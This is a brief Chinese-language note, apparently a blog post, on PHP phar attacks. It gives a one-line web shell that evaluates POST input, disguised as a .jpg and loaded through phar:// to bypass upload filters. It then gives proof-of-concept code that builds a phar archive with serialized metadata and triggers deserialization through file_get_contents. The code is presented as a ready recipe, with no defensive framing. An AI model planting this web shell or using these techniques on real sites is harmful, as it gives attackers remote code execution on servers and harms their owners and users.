Phar绕过上传
test.php
<?php @eval($_POST["cmd"]);?>
压缩后改后缀名为jpg
index.php
<?php
include('phar://./test.jpg/test.php');
?>
Phar反序列化漏洞
test.php
<?php
class Test{
public $test="test";
}
@unlink("test.phar");
$phar = new Phar("test.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$o = new Test();
$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
$phar->stopBuffering(); //签名自动计算
?>
执行后生成test.phar
test.phar
测试代码
eval.php
<?php
class Test{
function __destruct(){
echo "test";
}
}
file_get_contents("phar://./test.phar/test.txt");
?>
eval.php
网友评论